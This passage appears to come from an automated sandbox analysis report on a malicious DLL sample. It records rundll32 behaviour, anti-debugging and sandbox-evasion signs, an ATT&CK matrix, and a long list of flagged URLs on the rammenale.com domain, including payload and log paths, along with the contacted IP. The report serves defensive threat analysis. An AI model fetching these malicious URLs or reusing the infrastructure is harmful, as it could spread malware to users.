Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeAPI coverage: 9.7 %
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 8.7 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6044Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6136Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE1B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,0_2_6BEE1B85
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF38F4 FindFirstFileExW,0_2_6BEF38F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE61B85 FindFirstFileW,_strlen,ExpandEnvironmentStringsW,CopyFileW,TerminateProcess,CloseHandle,CloseHandle,TerminateProcess,CloseHandle,CloseHandle,FindNextFileW,3_2_6FE61B85
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE738F4 FindFirstFileExW,3_2_6FE738F4
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 30000Jump to behavior
Source: rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
Source: rundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008128000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3374164503.0000000007B07000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008FB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3373357071.0000000008F7E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.000000000884C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEF4AF5 GetProcessHeap,0_2_6BEF4AF5
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE53EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6BEE53EE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE4EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6BEE4EDC
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEEDCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6BEEDCFD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE64EDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6FE64EDC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE6DCFD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6FE6DCFD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6FE653EE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6FE653EE

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.153.206.231 443
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LLD5HDX0PS.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE55EB cpuid 0_2_6BEE55EB
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6BEE503D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6BEE503D

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		111
Process Injection		11
Virtualization/Sandbox Evasion		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		111
Process Injection		LSASS Memory21
Security Software Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Rundll32		LSA Secrets12
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500944 Sample: LLD5HDX0PS.dll Startdate: 29/08/2024 Architecture: WINDOWS Score: 84 31 rammenale.com 2->31 35 Antivirus detection for URL or domain 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Sigma detected: rundll32 run dll from internet 2->39 41 2 other signatures 2->41 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 9->11         started        14 cmd.exe 1 9->14         started        16 rundll32.exe 9->16         started        18 2 other processes 9->18 signatures6 43 System process connects to network (likely due to code injection or exploit) 11->43 20 rundll32.exe 14->20         started        22 rundll32.exe 12 16->22         started        24 rundll32.exe 12 16->24         started        process7 process8 26 rundll32.exe 20->26         started        29 rundll32.exe 20->29         started        dnsIp9 33 rammenale.com 131.153.206.231, 443, 49712, 49713 SS-ASHUS United States 26->33

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
LLD5HDX0PS.dll0%ReversingLabs
LLD5HDX0PS.dll10%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
rammenale.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://rammenale.com/for2/regit.tmp%S100%Avira URL Cloudmalware
https://rammenale.com/_T0%Avira URL Cloudsafe
https://rammenale.com/fo0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmpsoft100%Avira URL Cloudmalware
https://rammenale.com/for2/aclogID100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpgQ100%Avira URL Cloudmalware
http://www.Dc.0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmp4z100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4w100%Avira URL Cloudmalware
https://rammenale.com/-H0%Avira URL Cloudsafe
https://rammenale.com/for2/regit.tmpmbt100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4m100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpnf100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp44uz100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp?J100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp%f100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpOJ100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt6634-1003.mun100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt6634-1003100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4F100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4D100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmph100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpP100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpK100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtC:100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpuS100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpS100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtl100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtsoft100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtg100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpG100%Avira URL Cloudmalware
https://rammenale.com/70%Avira URL Cloudsafe
https://rammenale.com/for2/aclog.txtu100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txts100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtr100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtq100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpE100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp0100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp1100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp3w100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtz100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp8100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp:100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp3100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4I100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4#100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpent100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtx4C100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtJ100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtI100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtfs:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtM3100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmprI3-100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtT100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt44100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp&bt100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtP100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpentfc100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4G100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp0s100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpkbu100%Avira URL Cloudmalware
https://rammenale.com/for2/regM100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp(f100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpkJ100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtf100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtd100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpWJz100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpsC:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt_100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4X100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4W100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp6634-1003Vbt100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt)100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtent100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp4$100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp~100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4P100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt2100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmplS100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt4h100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpq100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt:100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txt9100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpl100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpm100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpBJj100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtF2100%Avira URL Cloudmalware
https://rammenale.com/for2/aclogDevice100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmp100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtC100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpz100%Avira URL Cloudmalware
https://rammenale.com/for2/aclog.txtA100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpC:100%Avira URL Cloudmalware
https://rammenale.com/for2/regit.tmpu100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
rammenale.com
131.153.206.231
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://rammenale.com/for2/regit.tmptrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://rammenale.com/for2/aclogIDrundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpsoftrundll32.exe, 00000008.00000002.3369773765.000000000073E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369940309.000000000357F000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/forundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/regit.tmp%Srundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/_Trundll32.exe, 0000000D.00000002.3372381342.0000000008802000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/regit.tmpgQrundll32.exe, 00000008.00000002.3374164503.0000000007B02000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
http://www.Dc.rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/regit.tmp4zrundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp4wrundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/-Hrundll32.exe, 00000005.00000002.3372854058.0000000008AAE000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://rammenale.com/for2/regit.tmpmbtrundll32.exe, 00000009.00000002.3369940309.000000000350A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp4mrundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpnfrundll32.exe, 0000000D.00000002.3369386552.00000000009E0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp44uzrundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp?Jrundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp%frundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclogrundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmptrue
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpOJrundll32.exe, 0000000D.00000002.3369386552.00000000009EA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt6634-1003rundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txt6634-1003.munrundll32.exe, 0000000C.00000002.3369493253.000000000343A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp4Frundll32.exe, 00000009.00000002.3373357071.0000000008F96000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp4Drundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmphrundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpPrundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpKrundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtC:rundll32.exe, 00000005.00000002.3369497741.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3369351939.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369202584.0000000000B20000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3369345966.0000000000BE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369493253.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3369283677.0000000003300000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpuSrundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmpSrundll32.exe, 00000008.00000002.3369773765.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtlrundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtsoftrundll32.exe, 00000007.00000002.3369345966.0000000000C5F000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/aclog.txtgrundll32.exe, 00000005.00000002.3369497741.0000000000D51000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://rammenale.com/for2/regit.tmp4drundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmpfalse
    		unknown
    https://rammenale.com/for2/regit.tmpGrundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/7rundll32.exe, 00000008.00000002.3374164503.0000000007B1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091DA000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://rammenale.com/for2/aclog.txturundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtsrundll32.exe, 00000007.00000002.3372962854.000000000810D000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtrrundll32.exe, 00000005.00000002.3372854058.0000000008A93000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtqrundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpErundll32.exe, 00000008.00000002.3373826197.000000000484A000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp0rundll32.exe, 00000009.00000002.3373357071.0000000008FCB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3372381342.0000000008863000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp1rundll32.exe, 00000008.00000002.3374164503.0000000007B53000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp3wloaddll32.exe, 00000000.00000002.2160984366.0000000000D4C000.00000004.00000010.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txtzrundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3372854058.0000000008AF7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.0000000008164000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3372962854.000000000816B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009221000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.00000000091FC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.3373542181.0000000009209000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp8rundll32.exe, 0000000D.00000002.3369386552.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp:rundll32.exe, 00000008.00000002.3369525975.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.3369204567.00000000032A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3370380512.0000000000C20000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp3rundll32.exe, 00000008.00000002.3369773765.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp4Irundll32.exe, 00000008.00000002.3374164503.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/aclog.txt4#rundll32.exe, 00000005.00000002.3372854058.0000000008AC4000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmp4rundll32.exe, 0000000D.00000002.3372381342.0000000008833000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
    https://rammenale.com/for2/regit.tmpentrundll32.exe, 0000000D.00000002.3369386552.0000000000A52000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: malware
    		unknown
